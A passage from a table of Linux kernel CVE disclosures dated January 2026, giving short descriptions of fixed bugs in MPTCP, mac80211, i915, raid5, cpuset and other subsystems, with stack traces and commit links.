https://git.kernel.org/stable/c/65b1971147ec12f0b1cee0811c859a3d7d9b04ce https://git.kernel.org/stable/c/3437c775bf209c674ad66304213b6b3c3b1b3f69 https://git.kernel.org/stable/c/6df47e5bb9b62d72f186f826ab643ea1856877c7 https://git.kernel.org/stable/c/ef7f38df890f5dcd2ae62f8dbde191d72f3bebae |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mptcp: avoid deadlock on fallback while reinjecting Jakub reported an MPTCP deadlock at fallback time: WARNING: possible recursive locking detected 6.18.0-rc7-virtme #1 Not tainted -------------------------------------------- mptcp_connect/20858 is trying to acquire lock: ff1100001da18b60 (&msk->fallback_lock){+.-.}-{3:3}, at: __mptcp_try_fallback+0xd8/0x280 but task is already holding lock: ff1100001da18b60 (&msk->fallback_lock){+.-.}-{3:3}, at: __mptcp_retrans+0x352/0xaa0 other info that might help us debug this: Possible unsafe locking scenario: CPU0 ---- lock(&msk->fallback_lock); lock(&msk->fallback_lock); *** DEADLOCK *** May be due to missing lock nesting notation 3 locks held by mptcp_connect/20858: #0: ff1100001da18290 (sk_lock-AF_INET){+.+.}-{0:0}, at: mptcp_sendmsg+0x114/0x1bc0 #1: ff1100001db40fd0 (k-sk_lock-AF_INET#2){+.+.}-{0:0}, at: __mptcp_retrans+0x2cb/0xaa0 #2: ff1100001da18b60 (&msk->fallback_lock){+.-.}-{3:3}, at: __mptcp_retrans+0x352/0xaa0 stack backtrace: CPU: 0 UID: 0 PID: 20858 Comm: mptcp_connect Not tainted 6.18.0-rc7-virtme #1 PREEMPT(full) Hardware name: Bochs, BIOS Bochs 01/01/2011 Call Trace: <TASK> dump_stack_lvl+0x6f/0xa0 print_deadlock_bug.cold+0xc0/0xcd validate_chain+0x2ff/0x5f0 __lock_acquire+0x34c/0x740 lock_acquire.part.0+0xbc/0x260 _raw_spin_lock_bh+0x38/0x50 __mptcp_try_fallback+0xd8/0x280 mptcp_sendmsg_frag+0x16c2/0x3050 __mptcp_retrans+0x421/0xaa0 mptcp_release_cb+0x5aa/0xa70 release_sock+0xab/0x1d0 mptcp_sendmsg+0xd5b/0x1bc0 sock_write_iter+0x281/0x4d0 new_sync_write+0x3c5/0x6f0 vfs_write+0x65e/0xbb0 ksys_write+0x17e/0x200 do_syscall_64+0xbb/0xfd0 entry_SYSCALL_64_after_hwframe+0x4b/0x53 RIP: 0033:0x7fa5627cbc5e Code: 4d 89 d8 e8 14 bd 00 00 4c 8b 5d f8 41 8b 93 08 03 00 00 59 5e 48 83 f8 fc 74 11 c9 c3 0f 1f 80 00 00 00 00 48 8b 45 10 0f 05 <c9> c3 83 e2 39 83 fa 08 75 e7 e8 13 ff ff ff 0f 1f 00 f3 0f 1e fa RSP: 002b:00007fff1fe14700 EFLAGS: 00000202 ORIG_RAX: 0000000000000001 RAX: ffffffffffffffda RBX: 0000000000000005 RCX: 00007fa5627cbc5e RDX: 0000000000001f9c RSI: 00007fff1fe16984 RDI: 0000000000000005 RBP: 00007fff1fe14710 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000000 R11: 0000000000000202 R12: 00007fff1fe16920 R13: 0000000000002000 R14: 0000000000001f9c R15: 0000000000001f9c The packet scheduler could attempt a reinjection after receiving an MP_FAIL and before the infinite map has been transmitted, causing a deadlock since MPTCP needs to do the reinjection atomically from WRT fallback. Address the issue explicitly avoiding the reinjection in the critical scenario. Note that this is the only fallback critical section that could potentially send packets and hit the double-lock. | 2026-01-14 | not yet calculated | CVE-2025-71126 | https://git.kernel.org/stable/c/0107442e82c0f8d6010e07e6030741c59c520d6e https://git.kernel.org/stable/c/252892d5a6a2f163ce18f32716e46fa4da7d4e79 https://git.kernel.org/stable/c/0ca9fb4335e726dab4f23b3bfe87271d8f005f41 https://git.kernel.org/stable/c/50f47c02be419bf0a3ae94c118addf67beef359f https://git.kernel.org/stable/c/ffb8c27b0539dd90262d1021488e7817fae57c42 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: mac80211: Discard Beacon frames to non-broadcast address Beacon frames are required to be sent to the broadcast address, see IEEE Std 802.11-2020, 11.1.3.1 ("The Address 1 field of the Beacon .. frame shall be set to the broadcast address"). A unicast Beacon frame might be used as a targeted attack to get one of the associated STAs to do something (e.g., using CSA to move it to another channel). As such, it is better have strict filtering for this on the received side and discard all Beacon frames that are sent to an unexpected address. This is even more important for cases where beacon protection is used. The current implementation in mac80211 is correctly discarding unicast Beacon frames if the Protected Frame bit in the Frame Control field is set to 0. However, if that bit is set to 1, the logic used for checking for configured BIGTK(s) does not actually work. If the driver does not have logic for dropping unicast Beacon frames with Protected Frame bit 1, these frames would be accepted in mac80211 processing as valid Beacon frames even though they are not protected. This would allow beacon protection to be bypassed. While the logic for checking beacon protection could be extended to cover this corner case, a more generic check for discard all Beacon frames based on A1=unicast address covers this without needing additional changes. Address all these issues by dropping received Beacon frames if they are sent to a non-broadcast address. | 2026-01-14 | not yet calculated | CVE-2025-71127 | https://git.kernel.org/stable/c/be0974be5c42584e027883ac2af7dab5e950098c https://git.kernel.org/stable/c/0a59a3895f804469276d188effa511c72e752f35 https://git.kernel.org/stable/c/88aab153d1528bc559292a12fb5105ee97528e1f https://git.kernel.org/stable/c/6e5bff40bb38741e40c33043ba0816fba5f93661 https://git.kernel.org/stable/c/7b240a8935d554ad36a52c2c37c32039f9afaef2 https://git.kernel.org/stable/c/a21704df4024708be698fb3fd5830d5b113b70e0 https://git.kernel.org/stable/c/193d18f60588e95d62e0f82b6a53893e5f2f19f8 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: erspan: Initialize options_len before referencing options. The struct ip_tunnel_info has a flexible array member named options that is protected by a counted_by(options_len) attribute. The compiler will use this information to enforce runtime bounds checking deployed by FORTIFY_SOURCE string helpers. As laid out in the GCC documentation, the counter must be initialized before the first reference to the flexible array member. After scanning through the files that use struct ip_tunnel_info and also refer to options or options_len, it appears the normal case is to use the ip_tunnel_info_opts_set() helper. Said helper would initialize options_len properly before copying data into options, however in the GRE ERSPAN code a partial update is done, preventing the use of the helper function. Before this change the handling of ERSPAN traffic in GRE tunnels would cause a kernel panic when the kernel is compiled with GCC 15+ and having FORTIFY_SOURCE configured: memcpy: detected buffer overflow: 4 byte write of buffer size 0 Call Trace: <IRQ> __fortify_panic+0xd/0xf erspan_rcv.cold+0x68/0x83 ? ip_route_input_slow+0x816/0x9d0 gre_rcv+0x1b2/0x1c0 gre_rcv+0x8e/0x100 ? raw_v4_input+0x2a0/0x2b0 ip_protocol_deliver_rcu+0x1ea/0x210 ip_local_deliver_finish+0x86/0x110 ip_local_deliver+0x65/0x110 ? ip_rcv_finish_core+0xd6/0x360 ip_rcv+0x186/0x1a0 Reported-at: https://launchpad.net/bugs/2129580 | 2026-01-14 | not yet calculated | CVE-2025-71128 | https://git.kernel.org/stable/c/b282b2a9eed848587c1348abdd5d83fa346a2743 https://git.kernel.org/stable/c/35ddf66c65eff93fff91406756ba273600bf61a3 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: LoongArch: BPF: Sign extend kfunc call arguments The kfunc calls are native calls so they should follow LoongArch calling conventions. Sign extend its arguments properly to avoid kernel panic. This is done by adding a new emit_abi_ext() helper. The emit_abi_ext() helper performs extension in place meaning a value already store in the target register (Note: this is different from the existing sign_extend() helper and thus we can't reuse it). | 2026-01-14 | not yet calculated | CVE-2025-71129 | https://git.kernel.org/stable/c/fd43edf357a3a1f5ed1c4bf450b60001c9091c39 https://git.kernel.org/stable/c/0d666db731e95890e0eda7ea61bc925fd2be90c6 https://git.kernel.org/stable/c/321993a874f571a94b5a596f1132f798c663b56e https://git.kernel.org/stable/c/3f5a238f24d7b75f9efe324d3539ad388f58536e |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/i915/gem: Zero-initialize the eb.vma array in i915_gem_do_execbuffer Initialize the eb.vma array with values of 0 when the eb structure is first set up. In particular, this sets the eb->vma[i].vma pointers to NULL, simplifying cleanup and getting rid of the bug described below. During the execution of eb_lookup_vmas(), the eb->vma array is successively filled up with struct eb_vma objects. This process includes calling eb_add_vma(), which might fail; however, even in the event of failure, eb->vma[i].vma is set for the currently processed buffer. If eb_add_vma() fails, eb_lookup_vmas() returns with an error, which prompts a call to eb_release_vmas() to clean up the mess. Since eb_lookup_vmas() might fail during processing any (possibly not first) buffer, eb_release_vmas() checks whether a buffer's vma is NULL to know at what point did the lookup function fail. In eb_lookup_vmas(), eb->vma[i].vma is set to NULL if either the helper function eb_lookup_vma() or eb_validate_vma() fails. eb->vma[i+1].vma is set to NULL in case i915_gem_object_userptr_submit_init() fails; the current one needs to be cleaned up by eb_release_vmas() at this point, so the next one is set. If eb_add_vma() fails, neither the current nor the next vma is set to NULL, which is a source of a NULL deref bug described in the issue linked in the Closes tag. When entering eb_lookup_vmas(), the vma pointers are set to the slab poison value, instead of NULL. This doesn't matter for the actual lookup, since it gets overwritten anyway, however the eb_release_vmas() function only recognizes NULL as the stopping value, hence the pointers are being set to NULL as they go in case of intermediate failure. This patch changes the approach to filling them all with NULL at the start instead, rather than handling that manually during failure. (cherry picked from commit 08889b706d4f0b8d2352b7ca29c2d8df4d0787cd) | 2026-01-14 | not yet calculated | CVE-2025-71130 | https://git.kernel.org/stable/c/25d69e07770745992387c016613fd7ac8eaf9893 https://git.kernel.org/stable/c/0336188cc85d0eab8463bd1bbd4ded4e9602de8b https://git.kernel.org/stable/c/24d55ac8e31d2f8197bfad71ffcb3bae21ed7117 https://git.kernel.org/stable/c/63f23aa2fbb823c8b15a29269fde220d227ce5b3 https://git.kernel.org/stable/c/4fe2bd195435e71c117983d87f278112c5ab364c |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: crypto: seqiv - Do not use req->iv after crypto_aead_encrypt As soon as crypto_aead_encrypt is called, the underlying request may be freed by an asynchronous completion. Thus dereferencing req->iv after it returns is invalid. Instead of checking req->iv against info, create a new variable unaligned_info and use it for that purpose instead. | 2026-01-14 | not yet calculated | CVE-2025-71131 | https://git.kernel.org/stable/c/18202537856e0fae079fed2c9308780bcff2bb9d https://git.kernel.org/stable/c/baf0e2d1e03ddb04781dfe7f22a654d3611f69b2 https://git.kernel.org/stable/c/50f196d2bbaee4ab2494bb1b0d294deba292951a https://git.kernel.org/stable/c/0279978adec6f1296af66b642cce641c6580be46 https://git.kernel.org/stable/c/ccbb96434d88e32358894c879457b33f7508e798 https://git.kernel.org/stable/c/5476f7f8a311236604b78fcc5b2a63b3a61b0169 https://git.kernel.org/stable/c/50fdb78b7c0bcc550910ef69c0984e751cac72fa |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: smc91x: fix broken irq-context in PREEMPT_RT When smc91x.c is built with PREEMPT_RT, the following splat occurs in FVP_RevC: [ 13.055000] smc91x LNRO0003:00 eth0: link up, 10Mbps, half-duplex, lpa 0x0000 [ 13.062137] BUG: workqueue leaked atomic, lock or RCU: kworker/2:1[106] [ 13.062137] preempt=0x00000000 lock=0->0 RCU=0->1 workfn=mld_ifc_work [ 13.062266] C ** replaying previous printk message ** [ 13.062266] CPU: 2 UID: 0 PID: 106 Comm: kworker/2:1 Not tainted 6.18.0-dirty #179 PREEMPT_{RT,(full)} [ 13.062353] Hardware name: , BIOS [ 13.062382] Workqueue: mld mld_ifc_work [ 13.062469] Call trace: [ 13.062494] show_stack+0x24/0x40 (C) [ 13.062602] __dump_stack+0x28/0x48 [ 13.062710] dump_stack_lvl+0x7c/0xb0 [ 13.062818] dump_stack+0x18/0x34 [ 13.062926] process_scheduled_works+0x294/0x450 [ 13.063043] worker_thread+0x260/0x3d8 [ 13.063124] kthread+0x1c4/0x228 [ 13.063235] ret_from_fork+0x10/0x20 This happens because smc_special_trylock() disables IRQs even on PREEMPT_RT, but smc_special_unlock() does not restore IRQs on PREEMPT_RT. The reason is that smc_special_unlock() calls spin_unlock_irqrestore(), and rcu_read_unlock_bh() in __dev_queue_xmit() cannot invoke rcu_read_unlock() through __local_bh_enable_ip() when current->softirq_disable_cnt becomes zero. To address this issue, replace smc_special_trylock() with spin_trylock_irqsave(). | 2026-01-14 | not yet calculated | CVE-2025-71132 | https://git.kernel.org/stable/c/1c4cb705e733250d13243f6a69b8b5a92e39b9f6 https://git.kernel.org/stable/c/9d222141b00156509d67d80c771fbefa92c43ace https://git.kernel.org/stable/c/ef277ae121b3249c99994652210a326b52d527b0 https://git.kernel.org/stable/c/36561b86cb2501647662cfaf91286dd6973804a6 https://git.kernel.org/stable/c/b6018d5c1a8f09d5efe4d6961d7ee45fdf3a7ce3 https://git.kernel.org/stable/c/6402078bd9d1ed46e79465e1faaa42e3458f8a33 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/irdma: avoid invalid read in irdma_net_event irdma_net_event() should not dereference anything from "neigh" (alias "ptr") until it has checked that the event is NETEVENT_NEIGH_UPDATE. Other events come with different structures pointed to by "ptr" and they may be smaller than struct neighbour. Move the read of neigh->dev under the NETEVENT_NEIGH_UPDATE case. The bug is mostly harmless, but it triggers KASAN on debug kernels: BUG: KASAN: stack-out-of-bounds in irdma_net_event+0x32e/0x3b0 [irdma] Read of size 8 at addr ffffc900075e07f0 by task kworker/27:2/542554 CPU: 27 PID: 542554 Comm: kworker/27:2 Kdump: loaded Not tainted 5.14.0-630.el9.x86_64+debug #1 Hardware name: [...] Workqueue: events rt6_probe_deferred Call Trace: <IRQ> dump_stack_lvl+0x60/0xb0 print_address_description.constprop.0+0x2c/0x3f0 print_report+0xb4/0x270 kasan_report+0x92/0xc0 irdma_net_event+0x32e/0x3b0 [irdma] notifier_call_chain+0x9e/0x180 atomic_notifier_call_chain+0x5c/0x110 rt6_do_redirect+0xb91/0x1080 tcp_v6_err+0xe9b/0x13e0 icmpv6_notify+0x2b2/0x630 ndisc_redirect_rcv+0x328/0x530 icmpv6_rcv+0xc16/0x1360 ip6_protocol_deliver_rcu+0xb84/0x12e0 ip6_input_finish+0x117/0x240 ip6_input+0xc4/0x370 ipv6_rcv+0x420/0x7d0 __netif_receive_skb_one_core+0x118/0x1b0 process_backlog+0xd1/0x5d0 __napi_poll.constprop.0+0xa3/0x440 net_rx_action+0x78a/0xba0 handle_softirqs+0x2d4/0x9c0 do_softirq+0xad/0xe0 </IRQ> | 2026-01-14 | not yet calculated | CVE-2025-71133 | https://git.kernel.org/stable/c/db93ae6fa66f1c61ae63400191195e3ee58021da https://git.kernel.org/stable/c/305c02e541befe4a44ffde30ed374970f41aeb6c https://git.kernel.org/stable/c/fc23d05f0b3fb4d80657e7afebae2cae686b31c8 https://git.kernel.org/stable/c/bf197c7c79ef6458d1ee84dd7db251b51784885f https://git.kernel.org/stable/c/d9b9affd103f51b42322da4ed5ac025b560bc354 https://git.kernel.org/stable/c/6f05611728e9d0ab024832a4f1abb74a5f5d0bb0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/page_alloc: change all pageblocks migrate type on coalescing When a page is freed it coalesces with a buddy into a higher order page while possible. When the buddy page migrate type differs, it is expected to be updated to match the one of the page being freed. However, only the first pageblock of the buddy page is updated, while the rest of the pageblocks are left unchanged. That causes warnings in later expand() and other code paths (like below), since an inconsistency between migration type of the list containing the page and the page-owned pageblocks migration types is introduced. [ 308.986589] ------------[ cut here ]------------ [ 308.987227] page type is 0, passed migratetype is 1 (nr=256) [ 308.987275] WARNING: CPU: 1 PID: 5224 at mm/page_alloc.c:812 expand+0x23c/0x270 [ 308.987293] Modules linked in: algif_hash(E) af_alg(E) nft_fib_inet(E) nft_fib_ipv4(E) nft_fib_ipv6(E) nft_fib(E) nft_reject_inet(E) nf_reject_ipv4(E) nf_reject_ipv6(E) nft_reject(E) nft_ct(E) nft_chain_nat(E) nf_nat(E) nf_conntrack(E) nf_defrag_ipv6(E) nf_defrag_ipv4(E) nf_tables(E) s390_trng(E) vfio_ccw(E) mdev(E) vfio_iommu_type1(E) vfio(E) sch_fq_codel(E) drm(E) i2c_core(E) drm_panel_orientation_quirks(E) loop(E) nfnetlink(E) vsock_loopback(E) vmw_vsock_virtio_transport_common(E) vsock(E) ctcm(E) fsm(E) diag288_wdt(E) watchdog(E) zfcp(E) scsi_transport_fc(E) ghash_s390(E) prng(E) aes_s390(E) des_generic(E) des_s390(E) libdes(E) sha3_512_s390(E) sha3_256_s390(E) sha_common(E) paes_s390(E) crypto_engine(E) pkey_cca(E) pkey_ep11(E) zcrypt(E) rng_core(E) pkey_pckmo(E) pkey(E) autofs4(E) [ 308.987439] Unloaded tainted modules: hmac_s390(E):2 [ 308.987650] CPU: 1 UID: 0 PID: 5224 Comm: mempig_verify Kdump: loaded Tainted: G E 6.18.0-gcc-bpf-debug #431 PREEMPT [ 308.987657] Tainted: [E]=UNSIGNED_MODULE [ 308.987661] Hardware name: IBM 3906 M04 704 (z/VM 7.3.0) [ 308.987666] Krnl PSW : 0404f00180000000 00000349976fa600 (expand+0x240/0x270) [ 308.987676] R:0 T:1 IO:0 EX:0 Key:0 M:1 W:0 P:0 AS:3 CC:3 PM:0 RI:0 EA:3 [ 308.987682] Krnl GPRS: 0000034980000004 0000000000000005 0000000000000030 000003499a0e6d88 [ 308.987688] 0000000000000005 0000034980000005 000002be803ac000 0000023efe6c8300 [ 308.987692] 0000000000000008 0000034998d57290 000002be00000100 0000023e00000008 [ 308.987696] 0000000000000000 0000000000000000 00000349976fa5fc 000002c99b1eb6f0 [ 308.987708] Krnl Code: 00000349976fa5f0: c020008a02f2 larl %r2,000003499883abd4 00000349976fa5f6: c0e5ffe3f4b5 brasl %r14,0000034997378f60 #00000349976fa5fc: af000000 mc 0,0 >00000349976fa600: a7f4ff4c brc 15,00000349976fa498 00000349976fa604: b9040026 lgr %r2,%r6 00000349976fa608: c0300088317f larl %r3,0000034998800906 00000349976fa60e: c0e5fffdb6e1 brasl %r14,00000349976b13d0 00000349976fa614: af000000 mc 0,0 [ 308.987734] Call Trace: [ 308.987738] [<00000349976fa600>] expand+0x240/0x270 [ 308.987744] ([<00000349976fa5fc>] expand+0x23c/0x270) [ 308.987749] [<00000349976ff95e>] rmqueue_bulk+0x71e/0x940 [ 308.987754] [<00000349976ffd7e>] __rmqueue_pcplist+0x1fe/0x2a0 [ 308.987759] [<0000034997700966>] rmqueue.isra.0+0xb46/0xf40 [ 308.987763] [<0000034997703ec8>] get_page_from_freelist+0x198/0x8d0 [ 308.987768] [<0000034997706fa8>] __alloc_frozen_pages_noprof+0x198/0x400 [ 308.987774] [<00000349977536f8>] alloc_pages_mpol+0xb8/0x220 [ 308.987781] [<0000034997753bf6>] folio_alloc_mpol_noprof+0x26/0xc0 [ 308.987786] [<0000034997753e4c>] vma_alloc_folio_noprof+0x6c/0xa0 [ 308.987791] [<0000034997775b22>] vma_alloc_anon_folio_pmd+0x42/0x240 [ 308.987799] [<000003499777bfea>] __do_huge_pmd_anonymous_page+0x3a/0x210 [ 308.987804] [<00000349976cb0 ---truncated--- | 2026-01-14 | not yet calculated | CVE-2025-71134 | https://git.kernel.org/stable/c/914769048818021556c940b9163e8056be9507dd https://git.kernel.org/stable/c/a794d65b132107a085d165caba33aae1101316a5 https://git.kernel.org/stable/c/7838a4eb8a1d23160bd3f588ea7f2b8f7c00c55b |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: md/raid5: fix possible null-pointer dereferences in raid5_store_group_thread_cnt() The variable mddev->private is first assigned to conf and then checked: conf = mddev->private; if (!conf) ... If conf is NULL, then mddev->private is also NULL. In this case, null-pointer dereferences can occur when calling raid5_quiesce(): raid5_quiesce(mddev, true); raid5_quiesce(mddev, false); since mddev->private is assigned to conf again in raid5_quiesce(), and conf is dereferenced in several places, for example: conf->quiesce = 0; wake_up(&conf->wait_for_quiescent); To fix this issue, the function should unlock mddev and return before invoking raid5_quiesce() when conf is NULL, following the existing pattern in raid5_change_consistency_policy(). | 2026-01-14 | not yet calculated | CVE-2025-71135 | https://git.kernel.org/stable/c/20597b7229aea8b5bc45cd92097640257c7fc33b https://git.kernel.org/stable/c/e5abb6af905de6b2fead8a0b3f32ab0b81468a01 https://git.kernel.org/stable/c/7ad6ef91d8745d04aff9cce7bdbc6320d8e05fe9 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: adv7842: Avoid possible out-of-bounds array accesses in adv7842_cp_log_status() It's possible for cp_read() and hdmi_read() to return -EIO. Those values are further used as indexes for accessing arrays. Fix that by checking return values where it's needed. Found by Linux Verification Center (linuxtesting.org) with SVACE. | 2026-01-14 | not yet calculated | CVE-2025-71136 | https://git.kernel.org/stable/c/f81ee181cb036d046340c213091b69d9a8701a76 https://git.kernel.org/stable/c/f913b9a2ccd6114b206b9e91dae5e3dc13a415a0 https://git.kernel.org/stable/c/d6a22a4a96e4dfe6897cb3532d2b3016d87706f0 https://git.kernel.org/stable/c/a73881ae085db5702d8b13e2fc9f78d51c723d3f https://git.kernel.org/stable/c/60dde0960e3ead8a9569f6c494d90d0232ac0983 https://git.kernel.org/stable/c/b693d48a6ed0cd09171103ad418e4a693203d6e4 https://git.kernel.org/stable/c/8163419e3e05d71dcfa8fb49c8fdf8d76908fe51 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: octeontx2-pf: fix "UBSAN: shift-out-of-bounds error" This patch ensures that the RX ring size (rx_pending) is not set below the permitted length. This avoids UBSAN shift-out-of-bounds errors when users passes small or zero ring sizes via ethtool -G. | 2026-01-14 | not yet calculated | CVE-2025-71137 | https://git.kernel.org/stable/c/5d8dfa3abb9a845302e021cf9c92d941abbc011a https://git.kernel.org/stable/c/4cc4cfe4d23c883120b6f3d41145edbaa281f2ab https://git.kernel.org/stable/c/658caf3b8aad65f8b8e102670ca4f68c7030f655 https://git.kernel.org/stable/c/b23a2e15589466a027c9baa3fb5813c9f6a6c6dc https://git.kernel.org/stable/c/aa743b0d98448282b2cb37356db8db2a48524624 https://git.kernel.org/stable/c/442848e457f5a9f71a4e7e14d24d73dae278ebe3 https://git.kernel.org/stable/c/85f4b0c650d9f9db10bda8d3acfa1af83bf78cf7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/msm/dpu: Add missing NULL pointer check for pingpong interface It is checked almost always in dpu_encoder_phys_wb_setup_ctl(), but in a single place the check is missing. Also use convenient locals instead of phys_enc->* where available. Patchwork: https://patchwork.freedesktop.org/patch/693860/ | 2026-01-14 | not yet calculated | CVE-2025-71138 | https://git.kernel.org/stable/c/678d1c86566dfbb247ba25482d37fddde6140cc9 https://git.kernel.org/stable/c/471baae774a30a04cf066907b60eaf3732928cb7 https://git.kernel.org/stable/c/35ea3282136a630a3fd92b76f5a3a02651145ef1 https://git.kernel.org/stable/c/88733a0b64872357e5ecd82b7488121503cb9cc6 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: kernel/kexec: fix IMA when allocation happens in CMA area *** Bug description *** When I tested kexec with the latest kernel, I ran into the following warning: [ 40.712410] ------------[ cut here ]------------ [ 40.712576] WARNING: CPU: 2 PID: 1562 at kernel/kexec_core.c:1001 kimage_map_segment+0x144/0x198 [...] [ 40.816047] Call trace: [ 40.818498] kimage_map_segment+0x144/0x198 (P) [ 40.823221] ima_kexec_post_load+0x58/0xc0 [ 40.827246] __do_sys_kexec_file_load+0x29c/0x368 [...] [ 40.855423] ---[ end trace 0000000000000000 ]--- *** How to reproduce *** This bug is only triggered when the kexec target address is allocated in the CMA area. If no CMA area is reserved in the kernel, use the "cma=" option in the kernel command line to reserve one. *** Root cause *** The commit 07d24902977e ("kexec: enable CMA based contiguous allocation") allocates the kexec target address directly on the CMA area to avoid copying during the jump. In this case, there is no IND_SOURCE for the kexec segment. But the current implementation of kimage_map_segment() assumes that IND_SOURCE pages exist and map them into a contiguous virtual address by vmap(). *** Solution *** If IMA segment is allocated in the CMA area, use its page_address() directly. | 2026-01-14 | not yet calculated | CVE-2025-71139 | https://git.kernel.org/stable/c/a843e4155c83211c55b1b6cc17eab27a6a2c5b6f https://git.kernel.org/stable/c/a3785ae5d334bb71d47a593d54c686a03fb9d136 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: media: mediatek: vcodec: Use spinlock for context list protection lock Previously a mutex was added to protect the encoder and decoder context lists from unexpected changes originating from the SCP IP block, causing the context pointer to go invalid, resulting in a NULL pointer dereference in the IPI handler. Turns out on the MT8173, the VPU IPI handler is called from hard IRQ context. This causes a big warning from the scheduler. This was first reported downstream on the ChromeOS kernels, but is also reproducible on mainline using Fluster with the FFmpeg v4l2m2m decoders. Even though the actual capture format is not supported, the affected code paths are triggered. Since this lock just protects the context list and operations on it are very fast, it should be OK to switch to a spinlock. | 2026-01-14 | not yet calculated | CVE-2025-71140 | https://git.kernel.org/stable/c/2c1ea6214827041f548279c9eda341eda0cc8351 https://git.kernel.org/stable/c/b92c19675f632a41af1222027a231bc2b7efa7ed https://git.kernel.org/stable/c/3e858938b0e659f6ec9ddcf853a87f1c5c3f44e1 https://git.kernel.org/stable/c/a5844227e0f030d2af2d85d4aed10c5eca6ca176 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/tilcdc: Fix removal actions in case of failed probe The drm_kms_helper_poll_fini() and drm_atomic_helper_shutdown() helpers should only be called when the device has been successfully registered. Currently, these functions are called unconditionally in tilcdc_fini(), which causes warnings during probe deferral scenarios. [ 7.972317] WARNING: CPU: 0 PID: 23 at drivers/gpu/drm/drm_atomic_state_helper.c:175 drm_atomic_helper_crtc_duplicate_state+0x60/0x68 ... [ 8.005820] drm_atomic_helper_crtc_duplicate_state from drm_atomic_get_crtc_state+0x68/0x108 [ 8.005858] drm_atomic_get_crtc_state from drm_atomic_helper_disable_all+0x90/0x1c8 [ 8.005885] drm_atomic_helper_disable_all from drm_atomic_helper_shutdown+0x90/0x144 [ 8.005911] drm_atomic_helper_shutdown from tilcdc_fini+0x68/0xf8 [tilcdc] [ 8.005957] tilcdc_fini [tilcdc] from tilcdc_pdev_probe+0xb0/0x6d4 [tilcdc] Fix this by rewriting the failed probe cleanup path using the standard goto error handling pattern, which ensures that cleanup functions are only called on successfully initialized resources. Additionally, remove the now-unnecessary is_registered flag. | 2026-01-14 | not yet calculated | CVE-2025-71141 | https://git.kernel.org/stable/c/21e52dc7762908c3d499cfb493d1b8281fc1d3ab https://git.kernel.org/stable/c/71be8825e83c90c1e020feb77b29e6a99629e642 https://git.kernel.org/stable/c/a585c7ef9cabda58088916baedc6573e9a5cd2a7 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: cpuset: fix warning when disabling remote partition A warning was triggered as follows: WARNING: kernel/cgroup/cpuset.c:1651 at remote_partition_disable+0xf7/0x110 RIP: 0010:remote_partition_disable+0xf7/0x110 RSP: 0018:ffffc90001947d88 EFLAGS: 00000206 RAX: 0000000000007fff RBX: ffff888103b6e000 RCX: 0000000000006f40 RDX: 0000000000006f00 RSI: ffffc90001947da8 RDI: ffff888103b6e000 RBP: ffff888103b6e000 R08: 0000000000000000 R09: 0000000000000000 R10: 0000000000000001 R11: ffff88810b2e2728 R12: ffffc90001947da8 R13: 0000000000000000 R14: ffffc90001947da8 R15: ffff8881081f1c00 CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 CR2: 00007f55c8bbe0b2 CR3: 000000010b14c000 CR4: 00000000000006f0 Call Trace: <TASK> update_prstate+0x2d3/0x580 cpuset_partition_write+0x94/0xf0 kernfs_fop_write_iter+0x147/0x200 vfs_write+0x35d/0x500 ksys_write+0x66/0xe0 do_syscall_64+0x6b/0x390 entry_SYSCALL_64_after_hwframe+0x4b/0x53 RIP: 0033:0x7f55c8cd4887 Reproduction steps (on a 16-CPU machine): # cd /sys/fs/cgroup/ # mkdir A1 # echo +cpuset > A1/cgroup.subtree_control # echo "0-14" > A1/cpuset.cpus.exclusive # mkdir A1/A2 # echo "0-14" > A1/A2/cpuset.cpus.exclusive # echo "root" > A1/A2/cpuset.cpus.partition # echo 0 > /sys/devices/system/cpu/cpu15/online # echo member > A1/A2/cpuset.cpus.partition When CPU 15 is offlined, subpartitions_cpus gets cleared because no CPUs remain available for the top_cpuset, forcing partitions to share CPUs with the top_cpuset. In this scenario, disabling the remote partition triggers a warning stating that effective_xcpus is not a subset of subpartitions_cpus. Partitions should be invalidated in this case to inform users that the partition is now invalid(cpus are shared with top_cpuset). To fix this issue: 1. Only emit the warning only if subpartitions_cpus is not empty and the effective_xcpus is not a subset of subpartitions_cpus. 2. During the CPU hotplug process, invalidate partitions if subpartitions_cpus is empty. | 2026-01-14 | not yet calculated | CVE-2025-71142 | https://git.kernel.org/stable/c/5d8b9d38a7676be7bb5e7d57f92156a98dab39fb https://git.kernel.org/stable/c/aa7d3a56a20f07978d9f401e13637a6479b13bd0 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: clk: samsung: exynos-clkout: Assign .num before accessing .hws Commit f316cdff8d67 ("clk: Annotate struct clk_hw_onecell_data with __counted_by") annotated the hws member of 'struct clk_hw_onecell_data' with __counted_by, which informs the bounds sanitizer (UBSAN_BOUNDS) about the number of elements in .hws[], so that it can warn when .hws[] is accessed out of bounds. As noted in that change, the __counted_by member must be initialized with the number of elements before the first array access happens, otherwise there will be a warning from each access prior to the initialization because the number of elements is zero. This occurs in exynos_clkout_probe() due to .num being assigned after .hws[] has been accessed: UBSAN: array-index-out-of-bounds in drivers/clk/samsung/clk-exynos-clkout.c:178:18 index 0 is out of range for type 'clk_hw *[*]' Move the .num initialization to before the first access of .hws[], clearing up the warning. | 2026-01-14 | not yet calculated | CVE-2025-71143 | https://git.kernel.org/stable/c/fbf57f5e453dadadb3d29b2d1dbe067e3dc4e236 https://git.kernel.org/stable/c/eb1f3a6ab3efee2b52361879cdc2dc6b11f499c0 